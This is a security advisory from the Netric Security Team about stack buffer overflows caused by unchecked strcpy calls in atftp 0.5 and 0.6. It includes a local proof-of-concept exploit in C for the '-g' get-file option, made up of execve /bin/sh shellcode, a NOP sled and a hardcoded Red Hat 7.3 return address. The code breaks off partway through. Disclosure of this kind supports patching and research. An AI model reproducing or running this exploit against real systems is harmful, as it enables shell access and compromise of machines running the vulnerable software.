Netric Security Team - http://www.netric.[org|be] By sacrine atftp-0.6 type: stack overflow(s)(multiple) Priority: 6 [1] Description [2] Vulnerable [3] Exploit [4] Proof of concept [5] Vendor response [6] Patches [01] Description atftp is a client/server implementation of the TFTP protocol, that implements RFCs 1350, 2090, 2347, 2348, and 2349. packages can be downloaded here: ftp://ftp.mamalinux.com/pub/atftp/ There are several vulnerabilities, mostly with the well known "strcpy" problem. An example: .. strcpy(filename, directory); char filename(MAXLEN); .. this unchecked buffer can easily be exploited, there are more of these vulnerabilities, but we'll discuss only this one, the one in the "get file" option / the "-g" option. [2] Vulnerable I only tested the last 2 packages, but the previous versions are most likely vulnerable too. atftp-0.5 - vulnerable: YES - exploitable: YES atftp-0.6 - vulnerable: YES - exploitable: YES [3] Exploit /* * atftp.0.5 * atftp.0.6 - local proof of concept exploit * exploits an unchecked buffer in the "get file" option "-g" * * return addr tested on redhat 7.3 - 0xbffffbcc * change for other systems - ./k3 * * Netric Security(RESOURCE MATERIAL) * http://www.netric.org * written by sacrine */ #include #include #include #include #define EGG 1024 #define BUFLEN (356+9) #define NOP 0x90 /* eSDee's execve /bin/sh shellcode */ char shellcode[] = "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx "\x50" // push %eax "\x53" // push %ebx "\x8d\x0c\x24" // lea (%esp,1),%ecx "\xb0\x0b" // mov $0xb,%al "\xcd\x80"; // int $0x80 int main(int argc, char **argv[]) { unsigned long ret = 0xbffffbcc; char buf[BUFLEN]; char egg[EGG]; int c; char *ptr; long *ptr2; int i=0; if(argc>1) { ret = ret - atol(argv[1]); } memset(buf,NOP,sizeof(buf)); ptr=egg; for (i=0; i<1024-strlen(shellcode)-1;i++)*(ptr++) = '\x90'; for (i=0; i